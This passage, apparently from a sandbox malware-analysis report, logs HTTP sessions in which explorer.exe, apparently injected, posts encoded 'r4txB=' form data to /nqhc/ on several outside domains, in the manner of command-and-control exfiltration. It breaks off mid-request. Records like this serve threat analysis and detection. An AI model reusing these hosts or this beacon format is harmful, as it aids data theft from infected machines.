                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    69192.168.11.204989538.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:25.161257982 CET1783OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 78 41 5a 4b 31 4b 70 76 6b 34 50 46 38 58 73 31 71 4e 63 43 6f 30 48 59 53 62 76 67 71 46 63 59 48 6c 65 41 79 4c 63 6a 4c 4b 78 76 69 44 33 6f 67 6d 28 59 5a 4f 47 53 54 45 4a 50 4e 5f 47 48 73 6e 38 78 70 65 57 47 34 73 7a 6c 75 33 56 6b 5a 66 75 36 37 69 52 72 65 4b 31 4f 30 6d 73 6a 55 46 6d 51 4f 55 64 75 54 59 78 4c 42 59 6a 35 49 5f 6b 6d 54 49 71 72 41 70 41 31 52 45 38 75 48 4a 37 4c 76 67 47 39 30 75 4d 47 64 53 30 6b 48 4a 46 76 4d 58 48 78 37 55 7e 64 6e 76 7e 61 59 71 63 35 6e 4c 28 56 5a 6c 35 4e 34 6a 74 6c 65 62 51 50 63 39 6d 61 77 35 6b 66 53 6e 72 6c 34 57 38 42 33 61 54 66 6d 72 49 72 6d 6c 42 68 65 45 7a 38 44 38 70 45 41 74 51 32 63 64 72 34 44 4b 42 46 30 58 4a 7a 41 6e 44 33 70 39 59 55 39 61 46 66 53 73 4f 48 6f 58 6f 52 42 36 35 34 65 7a 79 49 65 4a 62 6d 64 48 52 2d 4a 66 32 44 4d 66 63 52 69 6f 37 7a 6b 77 51 71 28 68 4a 6b 79 45 63 47 6d 6c 74 70 6d 6b 64 73 59 57 57 53 63 79 4a 33 5a 72 71 6f 69 67 28 70 36 75 42 39 34 5a 37 4a 64 7a 75 70 56 57 35 79 4f 43 6a 70 49 62 34 64 67 46 41 31 44 43 55 77 46 69 35 30 46 52 72 4e 4a 54 4b 75 32 38 43 37 72 74 70 6e 48 57 49 35 4a 35 6b 6e 73 61 66 5f 58 4e 6e 30 59 34 6d 43 65 74 58 71 65 42 4c 4e 30 33 31 34 46 68 5a 6a 64 39 61 64 7e 64 4e 4a 39 76 6f 77 49 4c 6d 5a 76 7a 68 52 6f 61 34 6d 58 51 46 41 77 68 4e 41 68 31 69 68 7a 52 44 4e 57 5a 4e 53 77 58 69 6b 63 62 6f 74 6f 32 41 34 66 65 72 4c 57 74 56 66 6a 53 31 74 4a 30 68 48 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGexAZK1Kpvk4PF8Xs1qNcCo0HYSbvgqFcYHleAyLcjLKxviD3ogm(YZOGSTEJPN_GHsn8xpeWG4szlu3VkZfu67iRreK1O0msjUFmQOUduTYxLBYj5I_kmTIqrApA1RE8uHJ7LvgG90uMGdS0kHJFvMXHx7U~dnv~aYqc5nL(VZl5N4jtlebQPc9maw5kfSnrl4W8B3aTfmrIrmlBheEz8D8pEAtQ2cdr4DKBF0XJzAnD3p9YU9aFfSsOHoXoRB654ezyIeJbmdHR-Jf2DMfcRio7zkwQq(hJkyEcGmltpmkdsYWWScyJ3Zrqoig(p6uB94Z7JdzupVW5yOCjpIb4dgFA1DCUwFi50FRrNJTKu28C7rtpnHWI5J5knsaf_XNn0Y4mCetXqeBLN0314FhZjd9ad~dNJ9vowILmZvzhRoa4mXQFAwhNAh1ihzRDNWZNSwXikcboto2A4ferLWtVfjS1tJ0hHc.
                                                                                                                                                                                    Nov 21, 2022 19:24:25.361253977 CET1784INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:25 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    7192.168.11.2049830154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:29.460572004 CET553OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.youlian.fund
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.youlian.fund
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.youlian.fund/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 42 6d 47 30 73 32 7a 6e 35 58 66 6d 68 48 6f 57 30 62 7e 34 59 48 41 55 32 31 77 35 52 51 34 67 73 72 39 32 4d 48 45 58 4e 67 6b 55 74 6f 4e 4f 32 4a 78 4a 39 46 72 45 57 76 4d 45 56 5a 42 6b 35 64 56 76 42 4b 68 6a 46 32 36 6a 46 57 43 77 50 79 32 58 32 74 64 6b 7e 36 78 70 70 6c 72 63 4c 79 5a 51 6a 78 68 58 62 68 4c 44 38 62 66 59 78 61 53 44 4a 71 4e 32 66 38 36 4e 69 4c 44 62 63 74 43 64 64 38 4c 34 53 46 7a 6e 33 53 34 39 69 74 44 67 52 34 4b 55 48 4d 52 6a 38 6b 51 7a 75 78 71 49 5a 47 7a 74 4b 42 45 46 7e 5a 77 35 70 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=BmG0s2zn5XfmhHoW0b~4YHAU21w5RQ4gsr92MHEXNgkUtoNO2JxJ9FrEWvMEVZBk5dVvBKhjF26jFWCwPy2X2tdk~6xpplrcLyZQjxhXbhLD8bfYxaSDJqN2f86NiLDbctCdd8L4SFzn3S49itDgR4KUHMRj8kQzuxqIZGztKBEF~Zw5pw).
                                                                                                                                                                                    Nov 21, 2022 19:20:29.739981890 CET553INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:29 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    70192.168.11.204989638.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:27.348279953 CET1785OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 35 41 59 38 70 4b 71 49 77 34 4f 46 38 58 69 56 71 4d 63 43 6f 70 48 5a 36 66 76 67 33 77 63 64 44 6c 65 52 69 4c 63 52 7a 4b 68 5f 69 47 34 49 67 34 30 34 59 4e 47 53 76 51 4a 50 5a 76 47 30 77 6e 39 32 56 65 63 52 73 76 37 56 75 78 56 6b 5a 62 39 71 37 71 52 72 4b 61 31 4f 34 6d 73 6c 63 46 6e 69 47 55 66 39 37 59 38 37 42 58 34 70 49 4f 75 47 53 68 71 72 55 62 41 31 52 79 38 73 72 4a 37 4d 37 67 48 36 67 70 4d 6d 64 53 33 6b 47 66 42 76 49 62 48 78 58 63 7e 63 6a 76 7e 64 63 71 61 5a 6e 4c 76 68 74 36 37 74 35 71 67 46 66 5a 64 76 51 6c 6d 65 67 4c 6b 61 43 6e 72 56 73 57 38 79 66 61 66 65 6d 72 55 62 6d 6e 65 52 65 58 34 63 44 34 70 45 51 50 51 32 38 6e 72 5f 37 4b 43 6b 34 58 62 43 41 6d 55 6e 70 42 58 30 38 65 53 76 58 34 4f 45 51 4c 6f 52 42 71 35 36 79 7a 31 34 75 4a 4a 69 4a 47 63 4f 49 32 71 44 4e 59 57 78 75 6d 37 33 4d 34 51 71 33 50 4a 6e 7e 45 66 6d 6d 6c 6f 4b 7e 6e 58 63 59 4d 61 79 64 72 48 58 5a 43 71 6f 7e 38 28 74 72 62 42 4e 55 5a 36 39 35 7a 69 5a 56 4a 70 53 4f 47 73 4a 49 64 38 64 67 46 41 31 66 57 55 77 35 69 35 6c 39 52 70 36 74 54 50 35 69 38 41 37 72 72 70 6e 48 39 49 35 55 46 6b 6b 4d 6b 66 37 71 6f 6e 78 67 34 6c 57 61 74 44 4c 65 43 62 4e 30 34 78 34 46 32 58 44 51 37 61 64 69 46 4e 4e 68 5f 6f 43 4d 4c 6c 5a 66 7a 6c 52 6f 56 74 32 58 58 53 77 78 34 48 67 38 71 69 67 65 70 44 4f 4c 63 4e 56 30 58 67 54 64 45 74 74 6b 5f 53 62 28 46 76 73 43 38 54 63 58 36 6d 64 52 49 30 79 77 70 4a 51 65 4f 32 37 6f 36 48 62 59 77 5a 66 44 36 75 47 64 4b 43 43 6a 7a 6c 48 78 48 6b 4e 39 46 58 4a 70 63 66 58 59 63 68 45 53 56 70 31 47 64 68 65 48 48 6a 79 4b 48 79 79 33 48 75 6b 32 6a 6d 74 63 48 56 4e 74 7a 4a 44 58 56 50 7a 43 64 55 30 58 53 63 43 44 4c 61 34 58 34 36 4e 39 5f 6b 6d 62 63 75 6a 44 63 53 43 62 66 71 52 42 62 47 42 35 50 47 38 74 43 53 6c 4e 5a 4c 4b 31 50 70 46 7a 55 7a 53 4c 47 58 46 52 31 4c 61 48 6c 6f 59 79 39 47 7a 67 54 43 57 78 30 44 4a 76 51 50 6c 33 48 48 33 7e 5f 6b 59 35 49 73 7a 75 58 30 79 71 68 45 33 55 54 56 47 44 4a 28 58 55 7a 62 38 63 51 36 79 43 54 74 30 58 78 36 43 5a 72 68 59 37 73 42 41 68 74 79 34 30 36 50 45 61 6c 30 6e 71 62 4c 71 6f 50 6d 6f 45 50 78 7a 4d 64 65 77 36 75 70 51 77 46 39 75 32 31 35 51 4c 76 62 36 28 32 5a 6b 73 47 50 69 75 43 58 37 38 4e 38 45 69 71 6c 55 66 76 7a 4e 69 35 45 67 79 39 37 62 47 47 61 64 69 69 49 4d 48 66 6e 6f 6c 64 42 67 7a 5a 73 70 6b 75 35 42 4a 6b 47 69 31 51 4f 78 6f 4f 28 4c 55 72 43 76 6f 66 61 49 35 49 69 64 38 72 69 4e 55 69 53 52 78 35 48 30 79 36 6b 6e 39 52 71
                                                                                                                                                                                    Data Ascii: r4txB=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGe5AY8pKqIw4OF8XiVqMcCopHZ6fvg3wcdDleRiLcRzKh_iG4Ig404YNGSvQJPZvG0wn92VecRsv7VuxVkZb9q7qRrKa1O4mslcFniGUf97Y87BX4pIOuGShqrUbA1Ry8srJ7M7gH6gpMmdS3kGfBvIbHxXc~cjv~dcqaZnLvht67t5qgFfZdvQlmegLkaCnrVsW8yfafemrUbmneReX4cD4pEQPQ28nr_7KCk4XbCAmUnpBX08eSvX4OEQLoRBq56yz14uJJiJGcOI2qDNYWxum73M4Qq3PJn~EfmmloK~nXcYMaydrHXZCqo~8(trbBNUZ695ziZVJpSOGsJId8dgFA1fWUw5i5l9Rp6tTP5i8A7rrpnH9I5UFkkMkf7qonxg4lWatDLeCbN04x4F2XDQ7adiFNNh_oCMLlZfzlRoVt2XXSwx4Hg8qigepDOLcNV0XgTdEttk_Sb(FvsC8TcX6mdRI0ywpJQeO27o6HbYwZfD6uGdKCCjzlHxHkN9FXJpcfXYchESVp1GdheHHjyKHyy3Huk2jmtcHVNtzJDXVPzCdU0XScCDLa4X46N9_kmbcujDcSCbfqRBbGB5PG8tCSlNZLK1PpFzUzSLGXFR1LaHloYy9GzgTCWx0DJvQPl3HH3~_kY5IszuX0yqhE3UTVGDJ(XUzb8cQ6yCTt0Xx6CZrhY7sBAhty406PEal0nqbLqoPmoEPxzMdew6upQwF9u215QLvb6(2ZksGPiuCX78N8EiqlUfvzNi5Egy97bGGadiiIMHfnoldBgzZspku5BJkGi1QOxoO(LUrCvofaI5Iid8riNUiSRx5H0y6kn9Rq
                                                                                                                                                                                    Nov 21, 2022 19:24:27.348332882 CET1790OUTData Raw: 48 6f 57 49 73 4d 36 67 71 62 6f 78 30 6c 67 55 70 6f 4e 45 6a 6f 73 42 77 62 57 61 74 35 4a 46 59 76 65 69 6f 7e 2d 7a 30 50 4b 76 66 64 54 74 73 37 79 55 5a 77 74 70 70 30 41 62 57 79 72 50 56 65 30 54 55 4c 54 48 51 4c 4f 35 2d 6e 4f 44 65 42
                                                                                                                                                                                    Data Ascii: HoWIsM6gqbox0lgUpoNEjosBwbWat5JFYveio~-z0PKvfdTts7yUZwtpp0AbWyrPVe0TULTHQLO5-nODeBT4BK1EBjuz1Q6Izeot6lqwRCbi3fe3-mm9kk6mayCLgdWA_oIUBmk9Vll5dis~X8FgdATz5xxm7~nTP0SZDGi9cgn1tOVIABE7U7WXu7-yHWucoWW~mObB96mEBeEHDlCI3Gl40o1tjTFWrv0M_uk6keI2tbd3SOW
                                                                                                                                                                                    Nov 21, 2022 19:24:27.348381042 CET1797OUTData Raw: 39 47 4c 78 44 6d 64 4d 73 56 57 44 61 31 73 4e 31 56 67 59 75 73 36 70 6f 4f 39 4e 53 6c 6e 57 7a 68 78 6e 45 61 55 6a 43 4d 52 35 31 50 4c 43 79 72 67 75 78 43 79 5a 37 28 6c 70 6b 69 38 5a 4d 43 44 55 32 5a 39 66 6a 38 4d 48 4f 41 67 69 2d 4f
                                                                                                                                                                                    Data Ascii: 9GLxDmdMsVWDa1sN1VgYus6poO9NSlnWzhxnEaUjCMR51PLCyrguxCyZ7(lpki8ZMCDU2Z9fj8MHOAgi-OoiAusN5sp0Hgs6TyRP8Z8~y49fTEqtwQ53tZIT_o7qrRhdmrN6a86O5YCOkiFGU9-QxGjW1i47zbFrhrbYugloHPrbrloBhw0KAqzvu93qZ9goQqSEFwNKqL4K9X-9izApbuk6z1JuiPe3IwsVjV_mDQEy6uZ7rV6
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511173010 CET1800OUTData Raw: 78 48 43 33 74 72 54 67 42 61 6a 79 72 35 74 45 37 76 6a 69 4e 7e 54 77 2d 4b 72 53 4e 48 45 38 45 67 51 77 52 4a 47 78 52 59 38 36 4b 63 51 39 4a 28 65 4b 59 4f 44 61 31 68 4e 34 35 6b 48 32 36 62 4e 7e 52 70 6d 55 6d 78 49 78 56 28 6c 47 49 59
                                                                                                                                                                                    Data Ascii: xHC3trTgBajyr5tE7vjiN~Tw-KrSNHE8EgQwRJGxRY86KcQ9J(eKYODa1hN45kH26bN~RpmUmxIxV(lGIYjCnnbCdnlAEeL2EU1eo1FHTVVWaPhQcP_xXVMrFzZvhA-LKRntZ4FiLh4Ca~O0jZq~if7pmo8z0LkfyC1Ywan82V5hfa-qhAFCpEz9cDkD2jHWmxNGjn_VuwYZql1NTjY1OAX4eXSMOXzU3WoqoAEseQ-MZ7QM0R8
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511255980 CET1807OUTData Raw: 39 75 6d 56 64 46 65 79 50 30 53 33 55 5a 38 39 54 66 78 49 7a 46 52 46 30 51 59 7a 59 34 41 52 34 49 52 4c 38 43 5a 50 70 78 67 67 59 71 67 7e 5a 58 46 6e 6d 32 61 49 62 61 46 56 32 6e 55 74 2d 62 30 34 52 55 38 6c 63 64 51 4c 48 76 47 31 2d 52
                                                                                                                                                                                    Data Ascii: 9umVdFeyP0S3UZ89TfxIzFRF0QYzY4AR4IRL8CZPpxggYqg~ZXFnm2aIbaFV2nUt-b04RU8lcdQLHvG1-R3EKffbMc4eR0dWh8wSCIWEHbyeZuQQOHdPMPDPTXRnAT8N6z_jU~tDO3FQUYfWK4IuPXr0F3va2sdgCSUyxM2PzvSmA(outHbFP7v4wPGQ8bNP0ys2yEDPscLC-D0niiKV_L63Neh(MVJ0-I1KN(DOh0l8w12JbJT
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511596918 CET1822OUTData Raw: 56 79 66 73 42 69 32 74 69 30 38 49 59 55 78 4d 36 6f 56 72 66 37 6c 62 63 66 69 63 76 31 6c 4b 63 52 59 76 35 73 71 59 45 77 55 51 56 30 31 6f 50 70 74 59 59 45 51 70 55 75 6f 45 47 5a 70 69 74 59 57 39 35 28 43 4d 51 39 32 72 70 4f 37 7e 4c 37
                                                                                                                                                                                    Data Ascii: VyfsBi2ti08IYUxM6oVrf7lbcficv1lKcRYv5sqYEwUQV01oPptYYEQpUuoEGZpitYW95(CMQ92rpO7~L7ETBJM1j42hxWfvgseNYULuawijE1IChJm4oMdSuDqpXr8d_b9rsITTl6Sj7HEW5kY~PO0o7AcyZsjZsR2j9GU9SWhE5UA9Op18SMrhnnab7OlrCfsIe3GaChH5ynhQJJHCm8VIoRroWQux144z8qVGClyYHpes9c2
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674113989 CET1824OUTData Raw: 34 59 2d 74 6e 59 57 6e 5f 76 44 64 4d 4d 67 34 5a 34 4c 54 36 77 4f 6e 31 44 2d 47 5f 59 50 76 7a 4c 6f 67 46 51 45 41 53 6d 48 72 41 63 73 74 6d 6f 63 61 70 66 4f 69 45 36 59 4c 6b 73 46 64 42 4d 75 59 57 4b 47 7a 41 69 43 35 6e 6c 76 65 61 64
                                                                                                                                                                                    Data Ascii: 4Y-tnYWn_vDdMMg4Z4LT6wOn1D-G_YPvzLogFQEASmHrAcstmocapfOiE6YLksFdBMuYWKGzAiC5nlvead3GwPti8EwArUoAYUEm_d0mG5LrA40IJwbICXFqFpkew~eFlGqlmmAMEP3H6I55t266fnpucJnL2ZDLxxbIKPtxWE_efIIXuIp8n7MEFn_sHcmlyOGw7SzK0BgUOaUFLHKxGUoVGBJhgZ0F0s-p0s_c18tDkcSwNZE
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674164057 CET1828OUTData Raw: 7a 43 64 47 49 73 70 51 42 51 56 31 68 36 78 62 44 70 44 68 73 6d 69 4d 45 54 36 63 68 67 71 53 4d 73 4c 57 77 51 42 33 58 42 62 61 30 39 70 36 39 6d 44 52 71 62 69 68 63 45 55 5a 56 28 7a 30 76 38 74 41 53 34 77 6f 6c 77 4d 49 41 35 33 33 51 56
                                                                                                                                                                                    Data Ascii: zCdGIspQBQV1h6xbDpDhsmiMET6chgqSMsLWwQB3XBba09p69mDRqbihcEUZV(z0v8tAS4wolwMIA533QVhrMM6YpzFKoi9nuZLqgyU0YczjrzSyyKywbF6w8uG3hBH3znk2M5VjNEVCwxsmwO-PO1ZD5BTb6BEe75STDxYyNilaDJlVYqGrhLs9ssZhY3uCudJZEnJLvsVh7y5B6koqWmpT-BhOc2WckQKJq5PMfbS0VrL7gAW
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674212933 CET1835OUTData Raw: 35 4c 39 50 6f 47 43 67 51 75 58 64 43 32 43 63 31 48 74 75 55 6b 69 31 63 76 61 61 72 4a 70 4a 6a 4d 4a 6b 50 4e 54 73 5f 74 64 64 6d 62 34 59 51 74 4c 47 32 6b 6f 55 51 31 6d 52 46 7e 6e 42 69 50 78 6b 75 44 38 59 31 33 47 6a 70 74 49 6d 46 56
                                                                                                                                                                                    Data Ascii: 5L9PoGCgQuXdC2Cc1HtuUki1cvaarJpJjMJkPNTs_tddmb4YQtLG2koUQ1mRF~nBiPxkuD8Y13GjptImFVBClWaNIHvamqtfLGypXPfzrG_esKVKDGlHsPdfeQ2u8uF9iZ3FFkVGNrEhdlzxpc3nsYR577KjwnhSSso~26ubh8vYPEyDOGySf0BbJEsWyu_rZddMxpMHB3yUrxcDbIhRCYHmedAGbCAmzYBeHQvrCzLIaEDU7S5
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674380064 CET1836OUTData Raw: 58 65 4b 61 5a 50 70 59 6d 51 76 52 34 4b 46 77 68 30 51 36 4b 50 6e 7a 59 56 53 38 46 6d 50 62 67 31 48 6e 74 53 57 6d 52 70 4b 76 6b 50 79 33 31 34 38 39 43 44 7a 49 71 4b 45 35 45 51 61 6a 56 76 4c 4d 5a 45 53 4d 6d 30 6f 6c 30 78 58 6d 65 54
                                                                                                                                                                                    Data Ascii: XeKaZPpYmQvR4KFwh0Q6KPnzYVS8FmPbg1HntSWmRpKvkPy31489CDzIqKE5EQajVvLMZESMm0ol0xXmeTjMcBrl1cvcTJfdKwOJTc8kBOEUQXIE1X61hernJbDG9Ji2QQeU11lgk5H2Fit2zEU5qofnDhvEUGowCdBw65sBTMbWp6Vg0g47bGM9auTMem2K28IkOOs3rvza7Cdbio6LEyMImBqRuaMZGlioWH7CXXSQG6azm0E
                                                                                                                                                                                    Nov 21, 2022 19:24:27.875634909 CET1837INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:27 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    71192.168.11.204989738.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:29.537976980 CET1838OUTGET /nqhc/?r4txB=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:24:29.707251072 CET1838INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:29 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1.0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    72192.168.11.20498983.13.90.7680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:34.861649036 CET1839OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gumba.shop
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gumba.shop
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 64 70 30 6f 68 78 4d 4d 78 31 43 43 63 66 69 6c 50 4e 6b 5f 72 4f 56 4c 52 44 6a 6b 4e 55 41 6a 5a 44 48 75 62 63 57 4c 64 6e 35 46 64 6a 69 5a 51 34 38 4b 38 65 53 56 4f 50 28 2d 6e 39 67 34 6c 57 49 35 6b 31 55 31 78 53 43 31 58 75 41 43 32 31 56 6e 65 31 4f 61 38 30 72 65 39 38 53 5f 62 72 28 4a 28 37 33 50 31 4d 4d 43 71 36 54 67 4b 76 58 54 49 76 79 65 7a 47 61 63 28 30 28 64 4b 58 67 71 52 73 73 34 55 6d 55 32 6b 51 4a 76 61 2d 4f 47 30 6e 56 79 72 71 55 6a 65 33 45 37 4d 44 62 43 33 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=S6tbconk9Vd-dp0ohxMMx1CCcfilPNk_rOVLRDjkNUAjZDHubcWLdn5FdjiZQ48K8eSVOP(-n9g4lWI5k1U1xSC1XuAC21Vne1Oa80re98S_br(J(73P1MMCq6TgKvXTIvyezGac(0(dKXgqRss4UmU2kQJva-OG0nVyrqUje3E7MDbC3w).
                                                                                                                                                                                    Nov 21, 2022 19:24:35.008651972 CET1839INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:34 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: nginx/1.16.1
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    73192.168.11.20498993.13.90.7680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:37.032330990 CET1841OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gumba.shop
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gumba.shop
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
